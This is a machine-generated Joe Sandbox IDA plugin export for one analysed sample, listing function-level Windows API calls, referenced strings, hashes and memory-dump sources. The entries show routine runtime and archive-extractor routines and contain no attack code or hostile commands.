                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                      • Opcode ID: 71db04a5c2f8444e91b951557401012d0c6fe6b4f517e41e547997f3e9006c2b
                                                                                                                                                      • Instruction ID: 89ed8d0af9f489449e59f501b86739cb70e0f343b732ce4162c2228a8f5c1e44
                                                                                                                                                      • Opcode Fuzzy Hash: 71db04a5c2f8444e91b951557401012d0c6fe6b4f517e41e547997f3e9006c2b
                                                                                                                                                      • Instruction Fuzzy Hash: 5EF01D74A10708FFCB11EBA4DC09B9EBAB5FB44726F000168A805A6150DA744945CA90
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A36C5E: __EH_prolog3_GS.LIBCMT ref: 00A36C65
                                                                                                                                                        • Part of subcall function 00A36C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00A36C9A
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A350B3
                                                                                                                                                      • GetProcAddress.KERNEL32(00A751F8,CryptUnprotectMemory), ref: 00A350C3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$DirectoryH_prolog3_System
                                                                                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                      • API String ID: 270589589-1753850145
                                                                                                                                                      • Opcode ID: 237003cde6174b2fd0e7b8fa2e9921cd2433b59ae7d4d9e1f1119ff047d9bc86
                                                                                                                                                      • Instruction ID: eb2e6a08b700d62f90a35e8eeb34acdb8f42fb1c97f72434a248c87f6b012922
                                                                                                                                                      • Opcode Fuzzy Hash: 237003cde6174b2fd0e7b8fa2e9921cd2433b59ae7d4d9e1f1119ff047d9bc86
                                                                                                                                                      • Instruction Fuzzy Hash: 84E04F71810711EED7309B78DC087467EE4BF05B26F00C82DB8D9D3585D6B5E4448B50
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AdjustPointer$_abort
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2252061734-0
                                                                                                                                                      • Opcode ID: bd89f28627153fdf01ad59e750b68915d8690a110f75b4fcb8a73de18ccd07f4
                                                                                                                                                      • Instruction ID: abef595561499be1495e6969d5db5a1a36b7429adae5c312ec77c0d9558d64ac
                                                                                                                                                      • Opcode Fuzzy Hash: bd89f28627153fdf01ad59e750b68915d8690a110f75b4fcb8a73de18ccd07f4
                                                                                                                                                      • Instruction Fuzzy Hash: A851E27AA01202AFDB289F54C941BABB3B4FFC4310F14452DE805472A2E731ECA4C791
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2F3C5
                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,00A2B749,?,?,?,?,?,?), ref: 00A2F450
                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 00A2F4A7
                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 00A2F569
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A2F570
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Create$CloseH_prolog3_HandleTime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4002707884-0
                                                                                                                                                      • Opcode ID: 49a6e0bf1d42f18f6cbd157b548dae918b4057d125877fb0dcfd1649daa79a0b
                                                                                                                                                      • Instruction ID: 9563a90c1adb95f76a5623ba257aa45cfea51ce0977cd1a87c9c07c928f256c8
                                                                                                                                                      • Opcode Fuzzy Hash: 49a6e0bf1d42f18f6cbd157b548dae918b4057d125877fb0dcfd1649daa79a0b
                                                                                                                                                      • Instruction Fuzzy Hash: D9517E70904258AEEF25EFE8E985BEEBBB5AF48314F240139F451F7280D7749A45CB24
                                                                                                                                                      APIs
                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00A52BE9
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A52C0C
                                                                                                                                                        • Part of subcall function 00A5040E: RtlAllocateHeap.NTDLL(00000000,00A4535E,?,?,00A46C16,?,?,?,?,?,00A45269,00A4535E,?,?,?,?), ref: 00A50440
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A52C32
                                                                                                                                                      • _free.LIBCMT ref: 00A52C45
                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A52C54
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                      • Opcode ID: fbf6ea2d2d691b3d8466ed97b05bcbef481e46107d5d218066ead4326da9cd7c
                                                                                                                                                      • Instruction ID: b5c2a86efebf795fd8dfc3f4818d91c0932740a32b5a563d562ec1d0dd62e160
                                                                                                                                                      • Opcode Fuzzy Hash: fbf6ea2d2d691b3d8466ed97b05bcbef481e46107d5d218066ead4326da9cd7c
                                                                                                                                                      • Instruction Fuzzy Hash: 4201DF726017107F63256BA66C88E7F6A6DFFC7BB33150228BD04D6216EE708C0692F0
APIs
• GetLastError.KERNEL32(00A4535E,00A4535E,?,00A501D8,00A50451,?,?,00A46C16,?,?,?,?,?,00A45269,00A4535E,?), ref: 00A5008E
• _free.LIBCMT ref: 00A500C3
• _free.LIBCMT ref: 00A500EA
• SetLastError.KERNEL32(00000000,?,00A4535E), ref: 00A500F7
• SetLastError.KERNEL32(00000000,?,00A4535E), ref: 00A50100
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 593128ecd8b17d6eafa308857e5f7ffa10857078406d12ae557f25ff70c5c794
• Instruction ID: 8b5f555eae3a48efdbe5bfbdd280eeb90b7552c5dbd3525ed3321fd05bea41d7
• Opcode Fuzzy Hash: 593128ecd8b17d6eafa308857e5f7ffa10857078406d12ae557f25ff70c5c794
• Instruction Fuzzy Hash: D401A4361447017BC322B7B46E86F2B257EFBC13737220124FD09A71D2EEB0880E9120
APIs
• _free.LIBCMT ref: 00A534C7
  • Part of subcall function 00A503D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?), ref: 00A503EA
  • Part of subcall function 00A503D4: GetLastError.KERNEL32(?,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?,?), ref: 00A503FC
• _free.LIBCMT ref: 00A534D9
• _free.LIBCMT ref: 00A534EB
• _free.LIBCMT ref: 00A534FD
• _free.LIBCMT ref: 00A5350F
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 9198fe552ba4c5d2b578202e9bac6ecf76620f9fa218183bde5be2a7557b1487
• Instruction ID: 33b938440334476342c493634de260a558c737e08ddb7b89d49dae4db0d871ef
• Opcode Fuzzy Hash: 9198fe552ba4c5d2b578202e9bac6ecf76620f9fa218183bde5be2a7557b1487
• Instruction Fuzzy Hash: 47F01273504200AB8A20DB98F686C1B77FDBB807A27590805FC49EB901DBB1FD84CB60
APIs
• _free.LIBCMT ref: 00A4F7DE
  • Part of subcall function 00A503D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?), ref: 00A503EA
  • Part of subcall function 00A503D4: GetLastError.KERNEL32(?,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?,?), ref: 00A503FC
• _free.LIBCMT ref: 00A4F7F0
• _free.LIBCMT ref: 00A4F803
• _free.LIBCMT ref: 00A4F814
• _free.LIBCMT ref: 00A4F825
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 6e4e0d2acaec066ec0e763c4fc62f185c57f1198aad96e7280bff2e94fbf5e04
• Instruction ID: 16a7f25be6c76acc500654dcd011dbd3549e237b52b4ecb31da0a030ee6e941c
• Opcode Fuzzy Hash: 6e4e0d2acaec066ec0e763c4fc62f185c57f1198aad96e7280bff2e94fbf5e04
• Instruction Fuzzy Hash: F8F05E75800B208FD616EFA4BD029193BA5F7147BB301411AF81DAE275C7B69887CB81
APIs
• _wcslen.LIBCMT ref: 00A431A4
  • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: _wcslen
• String ID: .lnk$0$lnk
• API String ID: 176396367-906397761
• Opcode ID: 48037d73ba75c0dfd961157c7fc9d69356c4422c4bd57e1f804fc9343425c4bf
• Instruction ID: 5d13e29fd3178275851aa3bef33bb3ffe268fee3777e33295e64e54d9631e6ec
• Opcode Fuzzy Hash: 48037d73ba75c0dfd961157c7fc9d69356c4422c4bd57e1f804fc9343425c4bf
• Instruction Fuzzy Hash: 8AE14876D002689FDF24DBA8DD85BDDB7B8BF58300F5005AAE509A7141DB74AB88CF60
APIs
• GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00A42B66
  • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
  • Part of subcall function 00A30BF3: _wcslen.LIBCMT ref: 00A30C03
• EndDialog.USER32(?,00000001), ref: 00A42EDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: _wcslen$DialogPathTemp
• String ID: $@set:user
• API String ID: 2172748170-1503366402
• Opcode ID: e7b5d7bb76790d1bd9d608667686a020148f9928a79ed90b071f98844935457c
• Instruction ID: 91864b3c83a3b7b76010afef22a56d3788d25cec54945d4228042d4d6c89b1bd
• Opcode Fuzzy Hash: e7b5d7bb76790d1bd9d608667686a020148f9928a79ed90b071f98844935457c
• Instruction Fuzzy Hash: 83C17C70C012A99FDF24EBA8DD45BDDBBB4AF65300F4440AAE409B7152DBB05B89CF60
APIs
  • Part of subcall function 00A31309: __EH_prolog3.LIBCMT ref: 00A31310
  • Part of subcall function 00A31309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00A317FB,?,?,\\?\,5C02E116,?,?,?,00000000,00A5A279,000000FF), ref: 00A31319
  • Part of subcall function 00A31AD1: __EH_prolog3_GS.LIBCMT ref: 00A31AD8
  • Part of subcall function 00A2F763: __EH_prolog3_GS.LIBCMT ref: 00A2F76A
  • Part of subcall function 00A2F58B: __EH_prolog3_GS.LIBCMT ref: 00A2F592
  • Part of subcall function 00A2F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,00A2A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00A2F5A8
  • Part of subcall function 00A2F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049), ref: 00A2F5EB
• SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00A42137
• MoveFileW.KERNEL32(?,?), ref: 00A422BE
• MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00A422D8
  • Part of subcall function 00A314CC: __EH_prolog3_GS.LIBCMT ref: 00A314D3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
• String ID: .tmp
• API String ID: 1688541384-2986845003
• Opcode ID: f9c5bdef4de90bb9c075db7815958c43eb48ab899f9bcf5fd2b209eedcb663b3
• Instruction ID: 69381255a4e6302ad33287d0ba67dfcd187b60a81ecda9fc1c95b6005b6428c8
                                                                                                                                                      • Opcode Fuzzy Hash: f9c5bdef4de90bb9c075db7815958c43eb48ab899f9bcf5fd2b209eedcb663b3
                                                                                                                                                      • Instruction Fuzzy Hash: 83C1E275C002689ADF25DFA8DD84BDDB7B8BF58300F9041EAE449A3241DB346B89CF61
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2A307
                                                                                                                                                      • GetLastError.KERNEL32(00000054,?,?,?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049), ref: 00A2A427
                                                                                                                                                        • Part of subcall function 00A2AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A2AC2E
                                                                                                                                                        • Part of subcall function 00A2AC11: GetLastError.KERNEL32 ref: 00A2AC72
                                                                                                                                                        • Part of subcall function 00A2AC11: CloseHandle.KERNEL32(?), ref: 00A2AC81
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                                                                                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                      • API String ID: 2235100918-639343689
                                                                                                                                                      • Opcode ID: 311cf9d60b924ec14c7238af7d0f0b57021918cd00cbafcabc00920683f5e190
                                                                                                                                                      • Instruction ID: 06f86defccca8d94fc3525c7aee26f5a5a3661ebacea62190f01bb87a94a1ad3
                                                                                                                                                      • Opcode Fuzzy Hash: 311cf9d60b924ec14c7238af7d0f0b57021918cd00cbafcabc00920683f5e190
                                                                                                                                                      • Instruction Fuzzy Hash: 7F415C75E00218AFDF14EBECF985BEDB7B9AF58314F04402AF501B7241DBB499458B26
                                                                                                                                                      APIs
                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A49E7B
                                                                                                                                                      • _abort.LIBCMT ref: 00A49F86
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EncodePointer_abort
                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                      • API String ID: 948111806-2084237596
                                                                                                                                                      • Opcode ID: 5e140610f06f872f79db95218327fe4b89903babfa545c79934947ddb40168d7
                                                                                                                                                      • Instruction ID: df8080719c5ac5d78a7bfce356167abfc6a99de0bf6ce938dd5312142a5521a5
                                                                                                                                                      • Opcode Fuzzy Hash: 5e140610f06f872f79db95218327fe4b89903babfa545c79934947ddb40168d7
                                                                                                                                                      • Instruction Fuzzy Hash: 6F413575900209AFCF16DF98C981AAFBBB5BF88304F188199FA04A6261D335A961DB51
                                                                                                                                                      APIs
                                                                                                                                                      • __fprintf_l.LIBCMT ref: 00A3340E
                                                                                                                                                      • _strncpy.LIBCMT ref: 00A33459
                                                                                                                                                        • Part of subcall function 00A389ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00A6E088,?,00000007,00A333E2,?,?,00000050,5C02E116), ref: 00A38A0A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                      • String ID: $%s$@%s
                                                                                                                                                      • API String ID: 562999700-834177443
                                                                                                                                                      • Opcode ID: d789ce075c9583e90617a931c1ef55afcaa02551c1a7a3adf8dec161d1bbaed4
                                                                                                                                                      • Instruction ID: 42547bab3c6ae17c9161ba28d64838df79128da04070e91eac52ddb246440472
                                                                                                                                                      • Opcode Fuzzy Hash: d789ce075c9583e90617a931c1ef55afcaa02551c1a7a3adf8dec161d1bbaed4
                                                                                                                                                      • Instruction Fuzzy Hash: 0D215973A04709ABDB11DFA8CD85EAE7BB8BB04311F044526FA10DB291D775EA158B60
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A3F8F7
                                                                                                                                                        • Part of subcall function 00A21E44: GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
                                                                                                                                                        • Part of subcall function 00A21E44: SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A3F99F
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 00A3F9E1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemText$DialogH_prolog3_Window
                                                                                                                                                      • String ID: ASKNEXTVOL
                                                                                                                                                      • API String ID: 2321058237-3402441367
                                                                                                                                                      • Opcode ID: 34ee0e8a9c658c55fcc85664b0dda330cdcf8987d398de4b577e1a9b3370cf6c
                                                                                                                                                      • Instruction ID: 5226a06e21e53fb59a3557b1ea35f6c5e666b36a9df058cc026af78997c31362
                                                                                                                                                      • Opcode Fuzzy Hash: 34ee0e8a9c658c55fcc85664b0dda330cdcf8987d398de4b577e1a9b3370cf6c
                                                                                                                                                      • Instruction Fuzzy Hash: FD217C31A50214BFDB14EFB8DD4AFAE37A8BF1A300F104034F9459B2A5C771AA05DB62
                                                                                                                                                      APIs
                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00A2FEBD,00000008,00000004,00A32D42,?,?,?,?,00000000,00A3ABB6,?), ref: 00A37484
                                                                                                                                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00A2FEBD,00000008,00000004,00A32D42,?,?,?,?,00000000), ref: 00A3748E
                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00A2FEBD,00000008,00000004,00A32D42,?,?,?,?,00000000), ref: 00A3749E
                                                                                                                                                      Strings
                                                                                                                                                      • Thread pool initialization failed., xrefs: 00A374B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
